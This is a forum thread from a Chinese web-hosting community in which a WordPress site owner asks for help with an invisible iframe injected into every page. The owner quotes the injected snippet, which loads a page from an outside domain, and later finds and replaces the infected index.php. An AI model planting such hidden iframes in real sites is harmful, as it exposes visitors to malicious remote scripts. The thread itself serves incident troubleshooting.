全球主机交流论坛

标题: 出现这个,是不是意味道被黑了? [打印本页]
作者: Ruclinux    时间: 2013-3-15 02:04
标题: 出现这个,是不是意味道被黑了?
本帖最后由 Ruclinux 于 2013-3-17 09:23 编辑


这个是一个陌生的地址,每个页面都存在,是不是服务器有安全问题了? 我准备找到它删了,但后边还需要做什么工作呢?谢谢

被添加的恶意代码,这个地址的源码里还是通过js调用一个伊朗网站.两台VPS,同一个服务商,一台是OVZ,一台是XEN,都出现这种情况.
<html>
<body>
<iframe> width="0" height="0" src="http://www.tel72.com/free33.html" frameborder="0"></iframe>
</body>
</heml>

作者: Toney    时间: 2013-3-15 02:14
织梦的站嘛?
作者: Ruclinux    时间: 2013-3-15 02:15
wordpress的站
作者: 农民工    时间: 2013-3-15 02:16
1数据备份
2重新官方下载新版wp
3修改密码
4不要乱用网上的主题和插件
5搞定
作者: 34beat    时间: 2013-3-15 02:18
农民工 发表于 2013-3-15 02:16
1数据备份
2重新官方下载新版wp
3修改密码


都不一定是WP的問題, 之前試過一次電腦中毒, 偷偷在網頁全加上JS
之後乖乖不再上 web2.0 CSS3.0版本的即時流動 日本大人JQuery學習動作影片網站了
作者: Ruclinux    时间: 2013-3-15 02:28
农民工 发表于 2013-3-15 02:16
1数据备份
2重新官方下载新版wp
3修改密码

没用其他的插件,甚至可以说没有用插件,除了那个过滤广告的插件之外
没有用其他主题,都是官方的主题.
作者: Ruclinux    时间: 2013-3-15 02:34
搜索全站文件没有包含有这个域名的文档,会不会是DNS污染? 谢谢了
作者: 农民工    时间: 2013-3-15 02:50
Ruclinux 发表于 2013-3-15 02:34
搜索全站文件没有包含有这个域名的文档,会不会是DNS污染? 谢谢了

地址给我,我去米国windows vps帮你测试下
作者: vagaa    时间: 2013-3-15 02:51
PM网站
作者: Ruclinux    时间: 2013-3-15 03:03
这代码出现在源码的最未端,在线检测过网站安全,并未有异常.但就是这个地址诡异
作者: 农民工    时间: 2013-3-15 03:04
本帖最后由 农民工 于 2013-3-15 07:14 编辑



自己看截图,我把我的ip都暴露出来了
难道是你域名的dns被污染么?
dnspod正常啊
作者: Ruclinux    时间: 2013-3-15 03:06
农民工 发表于 2013-3-15 03:04
自己看截图,我把我的ip都暴露出来了
难道是你域名的dns被污染么?
dnspod正常啊 ...

您的源码里同样出现这些代码,在最未端,谢谢了.
作者: 农民工    时间: 2013-3-15 03:07
Ruclinux 发表于 2013-3-15 03:06
您的源码里同样出现这些代码,在最未端,谢谢了.


我本地打开也是如此。你用的哪里的空间?

知道了
作者: Ruclinux    时间: 2013-3-15 03:09
德国的VPS
作者: 农民工    时间: 2013-3-15 03:17
Ruclinux 发表于 2013-3-15 03:09
德国的VPS

嗯,我原来也有,后来没续费了。
作者: Ruclinux    时间: 2013-3-15 03:31
我检查了另一个wordpress博客,并没有出现这些代码,只有这个有这些代码.
现在查找了所有文档并没有找到这代码,所以不知道它是怎么出现的.
作者: Ruclinux    时间: 2013-3-15 03:51
查询结果[1]: 207.182.142.166 ==>> 3484847782 ==>> 美国 俄亥俄州哥伦布市eNet股份有限公司XLHost数据中心

那个域名IP是美国的,是谁的来认领.
作者: 农民工    时间: 2013-3-15 03:58
Ruclinux 发表于 2013-3-15 03:51
查询结果[1]: 207.182.142.166 ==>> 3484847782 ==>> 美国 俄亥俄州哥伦布市eNet股份有限公司XLHost数据中 ...

不是我的
作者: Ruclinux    时间: 2013-3-15 07:08
问题暂时解决了,原来代码是在根目录下的index.php文件里,删除这个并重新上传新的index.php文件
更改了ssh密码,更改了kloxo密码,更改了FTP密码,更改了SolusVM密码
如果下次再出现就要重装了,可是重装也是一个问题,不知道哪个文件是问题文件.
代码里的地址页面引用的是伊朗的一个网站的js
作者: sdgl212    时间: 2013-3-15 08:46
哎 HK无处不在啊
作者: Ruclinux    时间: 2013-3-17 08:53
另一台VPS也出现这种情况,同一个服务商. 会是什么情况?
作者: Ruclinux    时间: 2013-3-17 09:31
需要给官方发tk吗? 因为是特价机,无维护的.



欢迎光临 全球主机交流论坛 (https://443502.xyz/) Powered by Discuz! X3.4